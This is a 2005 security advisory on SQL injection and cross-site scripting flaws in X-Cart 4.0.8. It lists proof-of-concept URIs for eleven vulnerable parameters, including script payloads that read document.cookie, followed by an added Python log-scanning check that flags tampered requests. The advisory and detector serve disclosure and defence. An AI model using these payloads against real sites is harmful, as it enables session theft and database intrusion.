| Field | Value |
|---|---|
| Title | Qualiteam X-Cart SQL Injection and Cross-Site Scripting Vulnerabilities |
| Published | 2005-05-30-12:00AM |
| Updated | 2005-06-17-02:25PM |
| Class | Input Validation Error |
| CVE | CVE-MAP-NOMATCH |
| Remote | Yes |
| Local | No |
| Credit | Discovery is credited to CENSORED <censored@mail.ru>. |
| Vulnerable | Qualiteam XCart 4.0.8 |
| Not Vulnerable | |
Code:

An exploit is not required.
The following proof of concept URIs are available:

SQL Injection:

http://www.example.com/home.php?cat='[SQL-inj]
http://www.example.com/home.php?printable='[SQL-inj]
http://www.example.com/product.php?productid='[SQL-inj]
http://www.example.com/product.php?mode='[SQL-inj]
http://www.example.com/error_message.php?access_denied&id='[SQL-inj]
http://www.example.com/help.php?section='[SQL-inj]
http://www.example.com/orders.php?mode='[SQL-inj]
http://www.example.com/register.php?mode='[SQL-inj]
http://www.example.com/search.php?mode='[SQL-inj]
http://www.example.com/giftcert.php?gcid='[SQL-inj]
http://www.example.com/giftcert.php?gcindex='[SQL-inj]

Cross-site Scripting:

http://www.example.com/home.php?cat='><script>alert(document.cookie)</script>
http://www.example.com/home.php?printable='><script>alert(document.cookie)</script>
http://www.example.com/product.php?productid='><script>alert(document.cookie)</script>
http://www.example.com/product.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://www.example.com/help.php?section='><script>alert(document.cookie)</script>
http://www.example.com/orders.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/register.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/search.php?mode='><script>alert(document.cookie)</script>
http://www.example.com/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://www.example.com/giftcert.php?gcindex='><script>alert(document.cookie)</script>
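
A log triage check for the script and parameter pairs listed above, as an added example that is not part of the original advisory: it flags requests in which one of those parameters carries a quote or angle bracket after URL decoding. The combined access-log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Script/parameter pairs taken from the proof of concept URIs in the advisory.
AFFECTED = {
    "/home.php": {"cat", "printable"},
    "/product.php": {"productid", "mode"},
    "/error_message.php": {"id"},
    "/help.php": {"section"},
    "/orders.php": {"mode"},
    "/register.php": {"mode"},
    "/search.php": {"mode"},
    "/giftcert.php": {"gcid", "gcindex"},
}
# Characters the proof of concept values start with: a quote, then markup.
SUSPICIOUS = re.compile(r"['<>]")
# Assumption: Apache/nginx "combined" log format, request line in quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_request(target):
    """Return [(param, decoded_value)] for affected parameters that look tampered."""
    parts = urlsplit(target)
    script = "/" + parts.path.rsplit("/", 1)[-1]  # ignore the install directory
    params = AFFECTED.get(script)
    if not params:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded input
        if name in params and SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (line_number, request_target, hits) for every flagged log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        hits = flag_request(match.group(1)) if match else []
        if hits:
            yield number, match.group(1), hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2005:10:00:01 +0000] "GET /home.php?cat=12 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [30/May/2005:10:00:05 +0000] "GET /product.php?productid=%27 HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [30/May/2005:10:00:09 +0000] "GET /xcart/help.php?section=%2527%253E%253Cscript%253E HTTP/1.1" 200 640 "-" "-"',
    '192.0.2.10 - - [30/May/2005:10:00:12 +0000] "GET /search.php?mode=search&q=o%27brien HTTP/1.1" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for number, target, hits in scan_log(SAMPLE_LOG):
        print(number, target, hits)
```

A hit is a lead for review rather than proof of exploitation; the last sample line is not flagged because `q` is not among the parameters the advisory lists.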
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 13:15:05 +0000